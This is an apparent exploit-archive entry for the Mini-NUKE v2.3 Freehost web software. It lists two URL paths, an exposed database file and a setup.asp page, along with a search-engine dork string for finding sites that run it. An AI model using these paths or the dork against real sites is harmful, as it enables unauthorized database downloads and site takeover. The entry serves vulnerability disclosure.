id: 10555
date: 01/01/2010
title: Mini-NUKE v2.3 Freehost Multiple Vulnerabilities
author: LionTurk
cves: 

================================================
Mini-NUKE v2.3 Freehost Multiple Vulnerabilities
================================================

########################################################################### 
 
    
 
===[ Exploit And Dork  ]=== 
 
    
 
  [»] http://server/db/mn7O4Z6J7L5W.mdb
 
  [»] http://server/setup.asp
 
 
  
 
 
  [»] bu site motoru copyright © 2004 mini-nuke v2.3 kullan?larak haz?rlanm??t?r
  



#  0day.today [2023-03-27]  #